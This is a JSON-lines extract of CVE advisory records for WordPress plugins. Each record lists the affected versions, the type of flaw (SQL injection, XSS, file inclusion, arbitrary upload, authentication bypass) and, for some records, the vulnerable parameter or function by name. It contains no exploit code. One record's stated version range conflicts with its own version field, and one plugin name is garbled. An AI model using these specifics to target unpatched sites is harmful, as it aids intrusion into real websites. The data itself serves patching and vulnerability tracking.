{"CVE_ID":"CVE-2023-0220","slug":"booking-system","versionEndExcluding":"2.9.9.2.9","description":"The Pinpoint Booking System WordPress plugin before 2.9.9.2.9 does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6d976be-31d1-419d-8729-4a36fbd2755c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6d976be-31d1-419d-8729-4a36fbd2755c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6230","slug":"pardakht-delkhah","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The ?????? ?????? ?????? WordPress plugin through 2.9.8 does not have CSRF check in place when resetting its form fields, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/311e3c15-0f58-4f3b-91f8-0c62c0eea55e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/311e3c15-0f58-4f3b-91f8-0c62c0eea55e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4830","slug":"paid-memberships-pro","versionEndExcluding":"2.9.9","description":"The Paid Memberships Pro WordPress plugin before 2.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae103336-a411-4ebf-a5f0-2f35701e364c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae103336-a411-4ebf-a5f0-2f35701e364c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11496","slug":"infility-global","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The Infility Global plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the infility_global_ajax function in all versions up to, and including, 2.9.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options and potentially break the site.","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/include\\\/class\\\/action.class.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/include\\\/class\\\/action.class.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/infility_global.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/infility_global.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0fd1c19-b752-4562-9365-165d709b91b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0fd1c19-b752-4562-9365-165d709b91b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9538","slug":"woolentor-addons","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The ShopLentor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.8 via the 'render' function in includes\/addons\/wl_faq.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b36938e-5333-4331-9bb1-34465fe03f2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b36938e-5333-4331-9bb1-34465fe03f2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164057\\\/woolentor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164057\\\/woolentor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36703","slug":"elementor","versionEndExcluding":"2.9.8","description":"The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG image uploads in versions up to, and including 2.9.7 This makes it possible for authenticated attackers with the upload_files capability to inject arbitrary web scripts in pages that will execute whenever a user accesses the page with the stored web scripts.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-elementor-plugin-fixed-svg-xss-protection-bypass-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-elementor-plugin-fixed-svg-xss-protection-bypass-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42db52ae-f881-4082-b475-8577a28641c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42db52ae-f881-4082-b475-8577a28641c6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8668","slug":"woolentor-addons","versionImpact":"2.9.7","versionEndExcluding":"2.9.8","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tooltip and countdown functionality in all versions up to, and including, 2.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe2b2e5-601f-4b6b-940a-b82f723b8776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe2b2e5-601f-4b6b-940a-b82f723b8776?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3155859%40woolentor-addons&new=3155859%40woolentor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3155859%40woolentor-addons&new=3155859%40woolentor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L151\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6120","slug":"usc-e-shop","versionImpact":"2.9.6","versionEndExcluding":"2.9.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server.","recommendation":"Update to version 2.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2677cea6-d60d-4e10-afd7-e088a5592b19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2677cea6-d60d-4e10-afd7-e088a5592b19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2992785\\\/usc-e-shop\\\/trunk\\\/classes\\\/paymentPaygent.class.php?contextall=1&old=2880236&old_path=%2Fusc-e-shop%2Ftrunk%2Fclasses%2FpaymentPaygent.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2992785\\\/usc-e-shop\\\/trunk\\\/classes\\\/paymentPaygent.class.php?contextall=1&old=2880236&old_path=%2Fusc-e-shop%2Ftrunk%2Fclasses%2FpaymentPaygent.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2999846%40usc-e-shop%2Ftrunk&old=2996147%40usc-e-shop%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2999846%40usc-e-shop%2Ftrunk&old=2996147%40usc-e-shop%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13528","slug":"emails-verification-for-woocommerce","versionImpact":"2.9.5","versionEndExcluding":"2.9.6","description":"The Customer Email Verification for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.9.5. This is due to the presence of a shortcode that will generate a confirmation link with a placeholder email. This makes it possible for authenticated attackers, with Contributor-level access and above, to generate a verification link for any unverified user and log into the account. The 'Fine tune placement' option must be enabled in the plugin settings in order to exploit the vulnerability.","recommendation":"Update to version 2.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-emails.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-emails.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238136\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b3798e3-45fe-4829-9012-dc728d4af87f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b3798e3-45fe-4829-9012-dc728d4af87f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10571","slug":"chart-builder","versionImpact":"2.9.5","versionEndExcluding":"2.9.6","description":"The Chartify \u2013 WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4837258-c749-4194-926c-22b67e20c1fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4837258-c749-4194-926c-22b67e20c1fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chart-builder\\\/tags\\\/2.9.6\\\/admin\\\/partials\\\/charts\\\/actions\\\/chart-builder-charts-actions-options.php?rev=3184238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chart-builder\\\/tags\\\/2.9.6\\\/admin\\\/partials\\\/charts\\\/actions\\\/chart-builder-charts-actions-options.php?rev=3184238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5953","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 does not validate files to be uploaded, as well as does not have authorisation and CSRF in an AJAX action handling such upload. As a result, any authenticated users, such as subscriber could upload arbitrary files, such as PHP on the server","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d29ba12-f14a-4cee-baae-a6049d83bce6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d29ba12-f14a-4cee-baae-a6049d83bce6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5952","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5951","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dc093a-545d-4bcd-ab85-ee9472d709e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dc093a-545d-4bcd-ab85-ee9472d709e5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13525","slug":"emails-verification-for-woocommerce","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Customer Email Verification for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4 via Shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including emails as well as hashed passwords of any user.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-core.php#L990\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-core.php#L990\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232261%40emails-verification-for-woocommerce%2Ftrunk&old=3230854%40emails-verification-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232261%40emails-verification-for-woocommerce%2Ftrunk&old=3230854%40emails-verification-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63a41d1-b9b0-43a9-a6e0-761f3b8d9d4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63a41d1-b9b0-43a9-a6e0-761f3b8d9d4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36761","slug":"top-10","versionEndExcluding":"2.9.5","description":"The Top 10 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.10.4. This is due to missing or incorrect nonce validation on the tptn_export_tables() function. This makes it possible for unauthenticated attackers to generate an export of the top 10 table via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368373%40top-10&new=2368373%40top-10&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368373%40top-10&new=2368373%40top-10&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0af86e4-c30b-49e2-ad6a-97a415a74d18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0af86e4-c30b-49e2-ad6a-97a415a74d18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7170","slug":"eventon-rsvp","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/218fb3af-3a40-486f-8ea9-80211a986fb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/218fb3af-3a40-486f-8ea9-80211a986fb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7847","slug":"ai-engine","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The AI Engine plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the rest_simpleFileUpload() function in versions 2.9.3 and 2.9.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server when the REST API is enabled, which may make remote code execution possible.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L673\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L673\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/modules\\\/files.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/modules\\\/files.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329842\\\/ai-engine\\\/trunk\\\/classes\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329842\\\/ai-engine\\\/trunk\\\/classes\\\/api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332539%40ai-engine&new=3332539%40ai-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332539%40ai-engine&new=3332539%40ai-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c1c7ec9-d01f-433d-abec-dc2b6ff684c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c1c7ec9-d01f-433d-abec-dc2b6ff684c7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6944","slug":"uncode-core","versionImpact":"2.9.4.2","versionEndExcluding":"2.9.4.3","description":"The Uncode Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'uncode_hl_text' and 'uncode_text_icon' shortcodes in all versions up to, and including, 2.9.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"name\":\"https:\\\/\\\/support.undsgn.com\\\/hc\\\/en-us\\\/articles\\\/213454129-Change-Log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52935b60-3ec5-45e6-9d12-200bf107c9df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52935b60-3ec5-45e6-9d12-200bf107c9df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5207","slug":"post-smtp","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The POST SMTP \u2013 The #1 WordPress SMTP Plugin with Advanced Email Logging and Delivery Failure Notifications plugin for WordPress is vulnerable to time-based SQL Injection via the selected parameter in all versions up to, and including, 2.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator access or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103db583-9399-4a45-a316-808b55fc6a6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/103db583-9399-4a45-a316-808b55fc6a6c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Postman-Email-Log\\\/PostmanEmailQueryLog.php?rev=2974258#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Postman-Email-Log\\\/PostmanEmailQueryLog.php?rev=2974258#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3094453%40post-smtp%2Ftrunk&old=3090744%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3094453%40post-smtp%2Ftrunk&old=3090744%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36709","slug":"kingcomposer","versionEndExcluding":"2.9.4","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via via shortcode in versions before 2.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6447de64-b484-4f64-ad78-7df81b5a0ed7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6447de64-b484-4f64-ad78-7df81b5a0ed7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpsocket.com\\\/plugin\\\/kingcomposer\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpsocket.com\\\/plugin\\\/kingcomposer\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3516","slug":"simple-lightbox","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The Simple Lightbox WordPress plugin before 2.9.4 does not validate and escape some of its attributes before outputting them back in a page\/post, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/336a78cd-297b-4f47-a007-e33eac7f1dad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/336a78cd-297b-4f47-a007-e33eac7f1dad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11727","slug":"notificationx","versionImpact":"2.9.3","versionEndExcluding":"2.9.4","description":"The NotificationX \u2013 Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content settings for notifications in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205560\\\/notificationx\\\/trunk\\\/includes\\\/FrontEnd\\\/Preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205560\\\/notificationx\\\/trunk\\\/includes\\\/FrontEnd\\\/Preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338edb1d-101a-4b6e-ac25-b59bd3e17f8b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338edb1d-101a-4b6e-ac25-b59bd3e17f8b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
